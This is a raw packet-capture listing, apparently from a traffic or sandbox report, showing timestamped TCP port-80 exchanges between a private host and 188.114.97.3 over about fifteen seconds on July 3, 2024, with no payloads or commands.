                                                    Jul 3, 2024 16:43:13.627429962 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.635381937 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.640749931 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.994719982 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.999988079 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.073318005 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.078469038 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.097179890 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.150738001 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.168092966 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.168271065 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.173341990 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.173408031 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.301501036 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.353986979 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.437292099 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.438276052 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.442511082 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.442565918 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.443293095 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.443367958 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.443526983 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.448544025 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.501064062 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.541354895 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.791599989 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.796561956 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.908571959 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.963301897 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.255477905 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.307003975 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.413913012 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.414371967 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.419334888 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.419437885 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.419625998 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.420290947 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.420603037 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.425424099 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.512069941 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.517421961 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.611356974 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.611572027 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.616460085 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.617202997 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.775877953 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.781172037 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.866590977 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.916448116 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.950858116 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.994597912 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.079298973 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.119493961 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.224643946 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.276041031 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.380975008 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.381298065 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.386280060 CEST8049804188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.386360884 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.386389017 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.386434078 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.386534929 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.391360998 CEST8049804188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.574249983 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.574368954 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.579257011 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.579408884 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.579525948 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.584778070 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.622819901 CEST8049804188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.703396082 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.708358049 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.708429098 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.708558083 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.713347912 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.756236076 CEST8049804188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.756282091 CEST4980480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.932291031 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:16.937736988 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:16.938119888 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.046717882 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.057207108 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.062311888 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.088227034 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.088772058 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.093763113 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.174099922 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.183898926 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.184073925 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.189090014 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.189136982 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.228858948 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.386924982 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.420027018 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.432029009 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.463236094 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.510787964 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.514166117 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.519059896 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.521200895 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.572597980 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.612626076 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.612823009 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:17.618052006 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.912786007 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:17.969162941 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.057023048 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.103867054 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.181857109 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.181857109 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.182740927 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.188245058 CEST8049805188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.188334942 CEST4980580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.188347101 CEST8049807188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.188472033 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.188649893 CEST8049806188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.188704014 CEST4980680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.189326048 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.195187092 CEST8049807188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.526547909 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.531414032 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.541557074 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.546458006 CEST8049807188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.666819096 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.666977882 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:18.671942949 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.672138929 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.828319073 CEST8049807188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:18.869498968 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:19.161552906 CEST8049807188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:19.165853024 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:19.213233948 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:19.216363907 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:19.289650917 CEST4980880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:19.294825077 CEST8049808188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:19.294898033 CEST4980880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:19.295015097 CEST4980880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:19.307585001 CEST8049808188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:19.651679993 CEST4980880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:19.656980991 CEST8049808188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:19.751260042 CEST8049808188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:19.791356087 CEST4980880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.081841946 CEST8049808188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.135296106 CEST4980880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.171363115 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.181046009 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.213325024 CEST4980880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.214355946 CEST4980980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.219244003 CEST8049808188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.219360113 CEST8049809188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.220410109 CEST4980880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.220455885 CEST4980980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.220547915 CEST4980980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.225537062 CEST8049809188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.272322893 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.272589922 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.277650118 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.277757883 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.573498011 CEST4980980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.653573036 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.655118942 CEST8049809188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.693593979 CEST8049809188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:20.697734118 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:20.744510889 CEST4980980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.076052904 CEST8049809188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.119534016 CEST4980980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.223279953 CEST4980980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.223587036 CEST4981080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.228427887 CEST8049810188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.228511095 CEST4981080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.228593111 CEST4981080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.229036093 CEST8049809188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.229090929 CEST4980980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.233444929 CEST8049810188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.573498964 CEST4981080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.578701973 CEST8049810188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.667474031 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.672312021 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.702276945 CEST8049810188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.744575024 CEST4981080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.761843920 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.761991024 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:21.766904116 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:21.767148972 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.047570944 CEST8049810188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.088299990 CEST4981080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.102695942 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.150705099 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.163440943 CEST4980780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.172177076 CEST4981080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.172800064 CEST4981180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.177570105 CEST8049810188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.177629948 CEST4981080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.177769899 CEST8049811188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.177865028 CEST4981180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.177994967 CEST4981180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.182739973 CEST8049811188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.526947021 CEST4981180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.529278040 CEST4981280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.529539108 CEST4981180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.531953096 CEST8049811188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.534306049 CEST8049812188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.534394026 CEST4981280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.534507990 CEST4981280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.539599895 CEST8049812188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.556772947 CEST8049811188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.558413982 CEST4981180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.648715019 CEST4981380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.653664112 CEST8049813188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.655354977 CEST4981380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.655508995 CEST4981380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.660327911 CEST8049813188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.891227007 CEST4981280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:22.896295071 CEST8049812188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.896359921 CEST8049812188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:22.996913910 CEST8049812188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.027967930 CEST4981380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.033060074 CEST8049813188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.041383982 CEST4981280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.104619980 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.109817982 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.116039038 CEST8049813188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.166385889 CEST4981380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.199186087 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.200545073 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.205537081 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.205574036 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.338403940 CEST8049812188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.385216951 CEST4981280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.479872942 CEST8049813188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.525768995 CEST4981380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.548437119 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.601336002 CEST4981380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.601337910 CEST4981280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.602032900 CEST4981480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.603863001 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.606611013 CEST8049813188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.606693983 CEST4981380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.606865883 CEST8049812188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.606905937 CEST8049814188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.606952906 CEST4981280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.606983900 CEST4981480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.607089043 CEST4981480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.611912966 CEST8049814188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.677416086 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:23.728964090 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.964037895 CEST4981480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:23.969083071 CEST8049814188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.072427988 CEST8049814188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.119492054 CEST4981480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.278676987 CEST8049814188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.322628975 CEST4981480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.398724079 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.398806095 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.402491093 CEST4981580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.407418966 CEST8049815188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.408427954 CEST4981580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.408545971 CEST4981580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.413352013 CEST8049815188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.683429003 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.688505888 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.761101007 CEST4981580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.768181086 CEST8049815188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.780395985 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.780597925 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:24.786063910 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.786077976 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.854747057 CEST8049815188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:24.900758982 CEST4981580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.071371078 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:25.106900930 CEST8049815188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:25.119471073 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.150782108 CEST4981580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.365753889 CEST4981580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.366303921 CEST4981680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.371181965 CEST8049815188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:25.371215105 CEST8049816188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:25.371267080 CEST4981580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.371319056 CEST4981680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.407663107 CEST4981680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.412671089 CEST8049816188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:25.760763884 CEST4981680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:25.765754938 CEST8049816188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.073241949 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.247201920 CEST8049816188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.248425007 CEST8049816188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.248661041 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.248821020 CEST4981680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.320358992 CEST8049816188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.337582111 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.337896109 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.342932940 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.342941999 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.369472027 CEST4981680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.446547985 CEST4981680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.447550058 CEST4981780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.452526093 CEST8049817188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.452605963 CEST4981780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.452727079 CEST8049816188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.452781916 CEST4981680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.452852964 CEST4981780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.457684994 CEST8049817188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.674227953 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.728880882 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.807116985 CEST4981780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:26.812024117 CEST8049817188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.912893057 CEST8049817188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:26.963217974 CEST4981780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.123236895 CEST8049817188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.166348934 CEST4981780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.240921974 CEST4981780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.241647005 CEST4981880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.246448040 CEST8049817188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.246534109 CEST4981780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.246649027 CEST8049818188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.246753931 CEST4981880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.246829033 CEST4981880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.251884937 CEST8049818188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.603986979 CEST4981880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.608952999 CEST8049818188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.686592102 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.691458941 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.723054886 CEST8049818188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.775755882 CEST4981880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.782900095 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.784478903 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:27.789484024 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:27.789505959 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.065099955 CEST8049818188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.074255943 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.119522095 CEST4981880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.119924068 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.179214001 CEST4981480192.168.2.10188.114.97.3
